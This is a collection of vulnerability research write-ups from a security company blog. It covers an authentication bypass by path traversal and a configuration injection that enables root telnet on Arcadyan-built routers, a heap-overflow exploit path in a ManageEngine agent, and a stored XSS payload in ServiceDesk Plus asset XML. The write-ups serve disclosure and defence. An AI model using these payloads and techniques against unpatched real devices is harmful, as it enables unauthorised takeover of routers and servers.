Another tenet violated would be to not roll your own crypto. There are tons of standard cryptographic algorithms implemented in well tested and designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where the PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers.. However, many of these systems are just sitting there unguarded and in some cases, without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electrics advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERTs advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we’re using (3.3V found using the multimeter earlier) we can run a UART scan which will try sending a carriage-return (or some other specified bytes) and receiving on each pin, at different bauds, which helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, lets see if we can get around it. Searching for where it is referenced in Ghidra we can see that it is only called from another function process_request() which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that it checks the value of uVar1 (set on line 43) before checking the output of evaluate_access(). This means that if the output of bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we will effectively skip the need to be authenticated, and the request will go through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list, and comparing the first n bytes of _dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests to made to js files

Looking at the Burp traffic, we can see a number of requests to /cgi/<various_nifty_cgi>.js are returning a 404, which normally return all of the info we’re looking for. We also see that there are a couple of parameters passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token, and figuring out where / how those are generated will be discussed in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that there is a fair amount of debugging output printed when errors occur. Stopping the default httpd process, and running it from our shell shows that we can easily see this output which may help us identify the issue with the current request.

requests failing due to improper Referrer header

Without diving into url_token_pass, we can see that it is saying that httoken is invalid from http://192.168.11.1/images/..%2finfo.html. We will dive into httokens next, but the token we have here is correct, which means that the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite to fix the Referer header to remove the /images/..%2f then we can see the info table, confirming our ability to bypass authentication.

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function get_token(), but get_token() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined we see this strange string defined.

Looking into where it is used, we find the following snippet.

Which, when run adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something equally strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

We can find a function where the httoken is being inserted into the img tag in Ghidra.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored encoded in the img tags at the bottom of any given page when it loads
  • They are then decoded in client-side javascript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first places I check for any web interface / application which has utilities like a ping function is to see how those utilities are implemented, because even just a quick Google turns up a number of historic examples of router ping utilities being prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline/carriage return character (%0A when url-encoded), followed by some text to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.

It was unclear whether simply injecting the configuration file with ARC_SYS_TelnetdEnable=1 would work, as it would then be followed by a conflicting setting later in the file (as ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipdaddress). However, after sending the following request in Burp Suite, and sending a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
Running a quick PoC against the WSR-2533DHPL2

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed that a number of devices which presented similar web interfaces to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and javascript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices it also became clear that not all of them were created equally, and the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on it became clear that many more vendors were affected and contacting and tracking them all would become very difficult, and so on May 18th, Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in either Tenable’s own advisory, and more information can be found on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.

Takeaways

The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!


Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server-side stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

